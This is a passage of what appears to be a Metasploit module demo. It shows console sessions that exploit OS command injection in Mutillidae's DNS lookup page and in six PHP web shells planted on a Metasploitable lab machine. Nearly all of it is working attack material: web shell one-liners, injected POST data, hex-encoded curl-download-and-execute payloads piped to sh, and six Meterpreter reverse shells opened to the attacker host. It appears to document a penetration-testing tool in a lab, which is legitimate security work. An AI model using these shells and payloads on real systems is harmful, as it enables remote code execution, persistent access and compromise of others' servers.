LHOST => tap0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
URIPATH => /mutillidae/index.php?page=dns-lookup.php
[-] Parse error: Unmatched quote: "set POSTDATA \"target_host="
[-] Parse error: Unmatched quote: "!INJECT!&dns-lookup-php-submit-button=Lookup+DNS\""
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set TARGET Linux
TARGET => Linux
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD payload/cmd/linux/https/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/linux/https/x86/meterpreter_reverse_tcp
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options

Module options (exploit/multi/http/os_cmd_exec):

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   HEADERS                                                                  no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   POSTDATA  target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS  no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
   Proxies                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS    10.0.0.10                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80                                                             yes       The target port (TCP)
   SSL       false                                                          no        Negotiate SSL/TLS for outgoing connections
   URIPATH   /mutillidae/index.php?page=dns-lookup.php                      yes       The URI to request, with the eval()'d parameter changed to !INJECT!
   VHOST                                                                    no        HTTP server virtual host


Payload options (cmd/linux/https/x86/meterpreter_reverse_tcp):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FETCH_CHECK_CERT  false            yes       Check SSL certificate
   FETCH_COMMAND     CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE      false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS    none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash
                                                , zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                      no        Local IP to use for serving payload
   FETCH_SRVPORT     8080             yes       Local port to use for serving payload
   FETCH_URIPATH                      no        Local URI to use for serving payload
   LHOST             tap0             yes       The listen address (an interface may be specified)
   LPORT             4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      qDBORhIFVMGx     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%20941SOn2o19H8AusK&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > run
[*] Command to run on remote host: curl -sko ./ZgSTqukSv https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./ZgSTqukSv;./ZgSTqukSv&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x5a\x67\x53\x54\x71\x75\x6b\x53\x76\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x5a\x67\x53\x54\x71\x75\x6b\x53\x76\x3b\x2e\x2f\x5a\x67\x53\x54\x71\x75\x6b\x53\x76\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:55270) at 2026-02-26 18:22:30 +0000

meterpreter >
meterpreter > shell
Process 5542 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

...Looks like the CLI arg doesn't like `;`!

- - -

## Demo (PHP)

```console
msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>'                       | sudo tee /var/www/a.php > /dev/null
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '<?php passthru($_REQUEST["cmd"]); ?>'                     | sudo tee /var/www/b.php > /dev/null
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '<?php echo exec($_REQUEST["cmd"]); ?>'                    | sudo tee /var/www/c.php > /dev/null
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '<?php echo shell_exec($_REQUEST["cmd"]); ?>'              | sudo tee /var/www/d.php > /dev/null
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>' | sudo tee /var/www/e.php > /dev/null
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '<?php echo `{$_REQUEST["cmd"]}`; ?>'                      | sudo tee /var/www/f.php > /dev/null
msfadmin@metasploitable:~$

$ curl http://10.0.0.10/a.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ curl http://10.0.0.10/b.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ curl http://10.0.0.10/c.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ curl http://10.0.0.10/d.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ curl http://10.0.0.10/e.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ curl http://10.0.0.10/f.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use exploits/multi/http/os_cmd_exec; set URIPATH /a.php?cmd=!INJECT!; set TARGET Linux; set PAYLOAD payload/cmd/linux/https/x86/meterpreter_reverse_tcp; check; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
URIPATH => /a.php?cmd=!INJECT!
TARGET => Linux
PAYLOAD => cmd/linux/https/x86/meterpreter_reverse_tcp
[*] Sending GET request: http://10.0.0.10:80/a.php?cmd=echo%20iJulixz8sQXBoMyLJ
[+] 10.0.0.10:80 - The target is vulnerable.
[*] Command to run on remote host: curl -sko ./KAWumMQrqb https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./KAWumMQrqb;./KAWumMQrqb&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/a.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x4b\x41\x57\x75\x6d\x4d\x51\x72\x71\x62\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x4b\x41\x57\x75\x6d\x4d\x51\x72\x71\x62\x3b\x2e\x2f\x4b\x41\x57\x75\x6d\x4d\x51\x72\x71\x62\x26%27%7csh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:47261) at 2026-02-26 18:57:48 +0000

meterpreter >
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set URIPATH /b.php
URIPATH => /b.php
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set POSTDATA cmd=!INJECT!
POSTDATA => cmd=!INJECT!
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > run
[*] Command to run on remote host: curl -sko ./LtiYYUHE https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./LtiYYUHE;./LtiYYUHE&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/b.php -> cmd=/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x4c\x74\x69\x59\x59\x55\x48\x45\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x4c\x74\x69\x59\x59\x55\x48\x45\x3b\x2e\x2f\x4c\x74\x69\x59\x59\x55\x48\x45\x26'|sh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:37193) at 2026-02-26 19:01:16 +0000

meterpreter >
meterpreter > background
[*] Backgrounding session 2...
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set --clear VERBOSE
VERBOSE => false
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set URIPATH /c.php
URIPATH => /c.php
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > run
[*] Command to run on remote host: curl -sko ./tVSNdpWUQ https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./tVSNdpWUQ;./tVSNdpWUQ&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/c.php -> cmd=/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x74\x56\x53\x4e\x64\x70\x57\x55\x51\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x74\x56\x53\x4e\x64\x70\x57\x55\x51\x3b\x2e\x2f\x74\x56\x53\x4e\x64\x70\x57\x55\x51\x26'|sh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 3 opened (10.0.0.1:4444 -> 10.0.0.10:37195) at 2026-02-26 19:02:23 +0000

meterpreter >
meterpreter > background
[*] Backgrounding session 3...
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set URIPATH /d.php
URIPATH => /d.php
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > run -j
[*] Command to run on remote host: curl -sko ./QHvABDKvCl https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./QHvABDKvCl;./QHvABDKvCl&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/os_cmd_exec) >
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/d.php -> cmd=/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x51\x48\x76\x41\x42\x44\x4b\x76\x43\x6c\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x51\x48\x76\x41\x42\x44\x4b\x76\x43\x6c\x3b\x2e\x2f\x51\x48\x76\x41\x42\x44\x4b\x76\x43\x6c\x26'|sh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 4 opened (10.0.0.1:4444 -> 10.0.0.10:40660) at 2026-02-26 19:15:31 +0000

msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set URIPATH /e.php
URIPATH => /e.php
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > exploit -j
[*] Command to run on remote host: curl -sko ./JsetuLiDODZ https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./JsetuLiDODZ;./JsetuLiDODZ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/os_cmd_exec) >
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/e.php -> cmd=/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x4a\x73\x65\x74\x75\x4c\x69\x44\x4f\x44\x5a\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x4a\x73\x65\x74\x75\x4c\x69\x44\x4f\x44\x5a\x3b\x2e\x2f\x4a\x73\x65\x74\x75\x4c\x69\x44\x4f\x44\x5a\x26'|sh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 5 opened (10.0.0.1:4444 -> 10.0.0.10:44762) at 2026-02-26 19:16:35 +0000

msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > set URIPATH /f.php?cmd=!INJECT!
URIPATH => /f.php?cmd=!INJECT!
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > exploit -j
[*] Command to run on remote host: curl -sko ./yCUdrXDOdc https://10.0.0.1:8080/RJwoDadwrNFsHZjKs3bLjw;chmod +x ./yCUdrXDOdc;./yCUdrXDOdc&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/os_cmd_exec) >
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTPS server started
[*] Adding resource /RJwoDadwrNFsHZjKs3bLjw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/f.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x3b\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x26%27%7csh -> cmd=/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6b\x6f\x20\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x52\x4a\x77\x6f\x44\x61\x64\x77\x72\x4e\x46\x73\x48\x5a\x6a\x4b\x73\x33\x62\x4c\x6a\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x3b\x2e\x2f\x79\x43\x55\x64\x72\x58\x44\x4f\x64\x63\x26'|sh
[*] Client 10.0.0.10 requested /RJwoDadwrNFsHZjKs3bLjw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 6 opened (10.0.0.1:4444 -> 10.0.0.10:44764) at 2026-02-26 19:17:06 +0000

msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                            Connection
  --  ----  ----                   -----------                            ----------
  1         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:47261 (10.0.0.10)
  2         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:37193 (10.0.0.10)
  3         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:37195 (10.0.0.10)
  4         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:40660 (10.0.0.10)
  5         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:44762 (10.0.0.10)
  6         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:44764 (10.0.0.10)

msf exploit(multi/http/os_cmd_exec) >
```